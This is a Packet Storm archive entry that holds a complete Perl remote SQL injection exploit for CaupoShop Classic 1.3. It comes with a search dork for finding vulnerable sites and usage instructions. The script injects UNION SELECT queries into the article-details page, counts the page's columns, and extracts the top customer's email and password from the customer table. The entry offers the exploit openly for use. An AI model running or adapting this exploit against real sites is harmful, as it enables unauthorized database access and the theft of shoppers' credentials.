cauposhop-sql.txt

2008-06-19T00:00:00
ID PACKETSTORM:67491
Type packetstorm
Reporter h0yt3r
Modified 2008-06-19T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
######################  
#  
#CaupoShop Classic 1.3 Remote Exploit  
#  
######################  
#  
#Bug by: h0yt3r  
#  
#Dork: inurl:csc_article_details.php  
# Couldnt find a stable dork for this specific Version.  
#Exploit will only work on correct version.  
#  
##  
###  
##  
#  
#I found this long time ago but never actually shared it.  
#As the userid's are a bit messy you will only get the top 1 row value.  
#Change it if you like.  
#  
#Gr33tz go to:  
#thund3r, ramon, b!zZ!t, Free-Hack, Sys-Flaw and of course the pwning h4ck-y0u Team  
########  
  
use LWP::UserAgent;  
my $userAgent = LWP::UserAgent->new;  
  
usage();  
  
$server = $ARGV[0];  
$dir = $ARGV[1];  
  
print"\n";  
if (!$dir) { die "Read Usage!\n"; }  
  
$filename ="csc_article_details.php";  
my $url = "http://".$server.$dir.$filename."?";  
  
my $Attack= $userAgent->get($url);  
if ($Attack->is_success)  
{  
print "[x] Attacking ".$url."\n";  
}  
else  
{  
print "Couldn't connect to ".$url."!";  
exit;  
}  
  
print "[x] Injecting Black Magic\n";  
  
my @count = ("66666");  
  
for ($i = 6; $i<99; $i++)  
{  
my $selectUrl = $url."saArticle[ID]=-275 union select 1,2,3,4, @count";  
my $Attack= $userAgent->get($selectUrl);  
if($Attack->content =~ 66666)  
{ last; }  
else  
{ push(@count,",66666"); }  
}  
  
my $Final = $url."saArticle[ID]=-1 union select 1,2,3,concat(1337,email,0x3a,password,1337), @count from csc_customer";   
  
my $Attack= $userAgent->get($Final);  
  
if($Attack->content =~ m/1337(.*?):(.*?)1337/i)  
{   
my $login = $1;  
my $pass = $2;  
print "[x] Success!\n";  
print "[x] Top 1 User Details:\n";  
  
print " Username: ".$login."\n";  
print " Password: ".$pass."\n";  
}  
else  
{  
print"[x] Something wrong...Version?\n";  
exit;  
  
}  
  
sub usage()  
{  
print q  
{  
#####################################################  
CaupoShop Classic Remote Exploit  
-Written by h0yt3r-  
Usage: CC.pl [Server] [Path]  
Sample:  
perl CC.pl www.site.com /shop/  
######################################################  
};  
  
}  
#eof  
`